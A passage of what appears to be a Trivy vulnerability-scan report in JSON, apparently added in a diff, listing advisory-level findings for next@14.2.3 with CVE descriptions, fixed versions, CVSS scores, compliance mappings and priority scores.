"remediation": "https://avd.aquasec.com/nvd/cve-2025-57752", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-524" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2025-57752", + "VendorIDs": [ + "GHSA-g5qg-72qw-gw5v" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.31, 15.4.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-57752", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:e3be615ed1140070180ac876273edccfb1b377de96b6e4f65e1ad6ef700e860a", + "Title": "nextjs: Next.js Affected by Cache Key Confusion for Image Optimization API Routes", + "Description": "Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization API routes are affected by cache key confusion. When images returned from API routes vary based on request headers (such as Cookie or Authorization), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-524" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 6.2 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 6.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-57752", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd", + "https://github.com/vercel/next.js/pull/82114", + "https://github.com/vercel/next.js/security/advisories/GHSA-g5qg-72qw-gw5v", + "https://nvd.nist.gov/vuln/detail/CVE-2025-57752", + "https://vercel.com/changelog/cve-2025-57752", + "https://www.cve.org/CVERecord?id=CVE-2025-57752" + ], + "PublishedDate": "2025-08-29T22:15:31.963Z", + "LastModifiedDate": "2025-09-08T16:43:50.33Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.391466666666664, + "epss": 0.00109, + "epss_percentile": 0.28624, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.00436, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "027359ccd596dbb5", + "ruleId": "CVE-2025-57822", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Next.js Improper Middleware Redirect Handling Leads to SSRF", + "title": "CVE-2025-57822", + "description": "Next.js is a React framework for building full-stack web applications. Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly passing the request object, it could lead to SSRF in self-hosted applications that incorrectly forwarded user-supplied headers. This vulnerability has been fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the next() function.", + "remediation": "https://avd.aquasec.com/nvd/cve-2025-57822", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-918" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2025-57822", + "VendorIDs": [ + "GHSA-4342-x723-ch2f" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "14.2.32, 15.4.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-57822", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:d25b005e7cf8bac08753ec41dc06257909625a91eeaa10bcc06f3ea028d530e1", + "Title": "Next.js Improper Middleware Redirect Handling Leads to SSRF", + "Description": "Next.js is a React framework for building full-stack web applications. Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly passing the request object, it could lead to SSRF in self-hosted applications that incorrectly forwarded user-supplied headers. This vulnerability has been fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the next() function.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-918" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N", + "V3Score": 6.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", + "V3Score": 8.2 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/9c9aaed5bb9338ef31b0517ccf0ab4414f2093d8", + "https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f", + "https://nvd.nist.gov/vuln/detail/CVE-2025-57822", + "https://vercel.com/changelog/cve-2025-57822" + ], + "PublishedDate": "2025-08-29T22:15:32.143Z", + "LastModifiedDate": "2025-09-08T16:41:41.253Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "owaspTop10_2021": [ + "A10:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-918", + "rank": 19, + "category": "SSRF" + } + ], + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 17.501333333333335, + "epss": 0.07815, + "epss_percentile": 0.92065, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.3126, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "580a09237cbe3791", + "ruleId": "CVE-2025-59471", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "next: NextJS Denial of Service in Image Optimizer", + "title": "CVE-2025-59471", + "description": "A denial of service vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.\r\n\r\nStrongly consider upgrading to 15.5.10 or 16.1.5 to reduce risk and prevent availability issues in Next applications.", + "remediation": "https://avd.aquasec.com/nvd/cve-2025-59471", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-400" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2025-59471", + "VendorIDs": [ + "GHSA-9g9p-9gw9-jx7f" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.10, 16.1.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-59471", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:5c1c3f76d7551a0dbaa560bc61f2517af1be6d9676bb5cccc73c04f0dd664b11", + "Title": "next: NextJS Denial of Service in Image Optimizer", + "Description": "A denial of service vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.\r\n\r\nStrongly consider upgrading to 15.5.10 or 16.1.5 to reduce risk and prevent availability issues in Next applications.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-400" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-59471", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c", + "https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec", + "https://github.com/vercel/next.js/releases/tag/v15.5.10", + "https://github.com/vercel/next.js/releases/tag/v16.1.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f", + "https://nvd.nist.gov/vuln/detail/CVE-2025-59471", + "https://www.cve.org/CVERecord?id=CVE-2025-59471" + ], + "PublishedDate": "2026-01-26T22:15:52.89Z", + "LastModifiedDate": "2026-02-13T15:03:20.29Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.347733333333334, + "epss": 0.00027, + "epss_percentile": 0.07874, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.00108, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "04e5c6fdba912e88", + "ruleId": "CVE-2026-27980", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage", + "title": "CVE-2026-27980", + "description": "Next.js is a React framework for building full-stack web applications. Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js image optimization disk cache (`/_next/image`) did not have a configurable upper bound, allowing unbounded cache growth. An attacker could generate many unique image-optimization variants and exhaust disk space, causing denial of service. This is fixed in version 16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`, including eviction of least-recently-used entries when the limit is exceeded. Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not immediately possible, periodically clean `.next/cache/images` and/or reduce variant cardinality (e.g., tighten values for `images.localPatterns`, `images.remotePatterns`, and `images.qualities`).", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-27980", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-400" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-27980", + "VendorIDs": [ + "GHSA-3x4c-7xq6-9pq8" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "16.1.7, 15.5.14", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27980", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:5dec13177768ddafe594e0b28117c9687a4df1799c6cf21c3db279c85cdce71f", + "Title": "next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage", + "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js image optimization disk cache (`/_next/image`) did not have a configurable upper bound, allowing unbounded cache growth. An attacker could generate many unique image-optimization variants and exhaust disk space, causing denial of service. This is fixed in version 16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`, including eviction of least-recently-used entries when the limit is exceeded. Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not immediately possible, periodically clean `.next/cache/images` and/or reduce variant cardinality (e.g., tighten values for `images.localPatterns`, `images.remotePatterns`, and `images.qualities`).", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-400" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", + "V40Score": 6.9 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-27980", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/39eb8e0ac498b48855a0430fbf4c22276a73b4bd", + "https://github.com/vercel/next.js/releases/tag/v16.1.7", + "https://github.com/vercel/next.js/security/advisories/GHSA-3x4c-7xq6-9pq8", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27980", + "https://www.cve.org/CVERecord?id=CVE-2026-27980" + ], + "PublishedDate": "2026-03-18T01:16:04.957Z", + "LastModifiedDate": "2026-03-18T19:52:54.307Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.345066666666668, + "epss": 0.00022, + "epss_percentile": 0.06354, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.00088, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "868dbd425c7fc3b4", + "ruleId": "CVE-2026-29057", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "next.js: Next.js: HTTP request smuggling in rewrites", + "title": "CVE-2026-29057", + "description": "Next.js is a React framework for building full-stack web applications. Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS` request using `Transfer-Encoding: chunked` could trigger request boundary disagreement between the proxy and backend. This could allow request smuggling through rewritten routes. An attacker could smuggle a second request to unintended backend routes (for example, internal/admin endpoints), bypassing assumptions that only the configured rewrite destination/path is reachable. This does not impact applications hosted on providers that handle rewrites at the CDN level, such as Vercel. The vulnerability originated in an upstream library vendored by Next.js. It is fixed in Next.js 15.5.13 and 16.1.7 by updating that dependency’s behavior so `content-length: 0` is added only when both `content-length` and `transfer-encoding` are absent, and `transfer-encoding` is no longer removed in that code path. If upgrading is not immediately possible, block chunked `DELETE`/`OPTIONS` requests on rewritten routes at the edge/proxy, and/or enforce authentication/authorization on backend routes.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-29057", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-444" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-29057", + "VendorIDs": [ + "GHSA-ggv3-7p47-pfv8" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "16.1.7, 15.5.13", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29057", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:4074e32bdcb36d75198ac9560fe4244edba80bb6731805115c47dcfbb97b302f", + "Title": "next.js: Next.js: HTTP request smuggling in rewrites", + "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS` request using `Transfer-Encoding: chunked` could trigger request boundary disagreement between the proxy and backend. This could allow request smuggling through rewritten routes. An attacker could smuggle a second request to unintended backend routes (for example, internal/admin endpoints), bypassing assumptions that only the configured rewrite destination/path is reachable. This does not impact applications hosted on providers that handle rewrites at the CDN level, such as Vercel. The vulnerability originated in an upstream library vendored by Next.js. It is fixed in Next.js 15.5.13 and 16.1.7 by updating that dependency’s behavior so `content-length: 0` is added only when both `content-length` and `transfer-encoding` are absent, and `transfer-encoding` is no longer removed in that code path. If upgrading is not immediately possible, block chunked `DELETE`/`OPTIONS` requests on rewritten routes at the edge/proxy, and/or enforce authentication/authorization on backend routes.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-444" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N", + "V40Score": 6.3 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "V3Score": 6.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-29057", + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/commit/dc98c04f376c6a1df76ec3e0a2d07edf4abdabd6", + "https://github.com/vercel/next.js/releases/tag/v15.5.13", + "https://github.com/vercel/next.js/releases/tag/v16.1.7", + "https://github.com/vercel/next.js/security/advisories/GHSA-ggv3-7p47-pfv8", + "https://nvd.nist.gov/vuln/detail/CVE-2026-29057", + "https://www.cve.org/CVERecord?id=CVE-2026-29057" + ], + "PublishedDate": "2026-03-18T01:16:05.443Z", + "LastModifiedDate": "2026-03-18T19:49:19.633Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.349866666666665, + "epss": 0.00031, + "epss_percentile": 0.0913, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.00124, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e4364d984e862d8f", + "ruleId": "CVE-2026-44576", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "Next.js vulnerable to cache poisoning in React Server Component responses", + "title": "CVE-2026-44576", + "description": "Next.js is a React framework for building full-stack web applications. From 14.2.0 to before 15.5.16 and 16.2.5, applications using React Server Components can be vulnerable to cache poisoning when shared caches do not correctly partition response variants. Under affected conditions, an attacker can cause an RSC response to be served from the original URL and poison shared cache entries so later visitors receive component payloads instead of the expected HTML. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-44576", + "references": [], + "tags": [ + "vulnerability", + "pkg:next@14.2.3" + ], + "risk": { + "cwe": [ + "CWE-436" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-44576", + "VendorIDs": [ + "GHSA-wfc6-r584-vfw7" + ], + "PkgID": "next@14.2.3", + "PkgName": "next", + "PkgIdentifier": { + "PURL": "pkg:npm/next@14.2.3", + "UID": "494c23d2c970c8b" + }, + "InstalledVersion": "14.2.3", + "FixedVersion": "15.5.16, 16.2.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44576", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:3c9e2e46b20aad817d3abe8e7abd455ede89a3c4d8a51dc478704b39dba080bb", + "Title": "Next.js vulnerable to cache poisoning in React Server Component responses", + "Description": "Next.js is a React framework for building full-stack web applications. From 14.2.0 to before 15.5.16 and 16.2.5, applications using React Server Components can be vulnerable to cache poisoning when shared caches do not correctly partition response variants. Under affected conditions, an attacker can cause an RSC response to be served from the original URL and poison shared cache entries so later visitors receive component payloads instead of the expected HTML. This vulnerability is fixed in 15.5.16 and 16.2.5.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-436" + ], + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L", + "V3Score": 5.4 + } + }, + "References": [ + "https://github.com/vercel/next.js", + "https://github.com/vercel/next.js/releases/tag/v15.5.16", + "https://github.com/vercel/next.js/releases/tag/v16.2.5", + "https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7", + "https://nvd.nist.gov/vuln/detail/CVE-2026-44576" + ], + "PublishedDate": "2026-05-13T17:16:23.04Z", + "LastModifiedDate": "2026-05-14T13:44:18.27Z" + }, + "context": { + "sbom": { + "name": "next", + "version": "14.2.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal 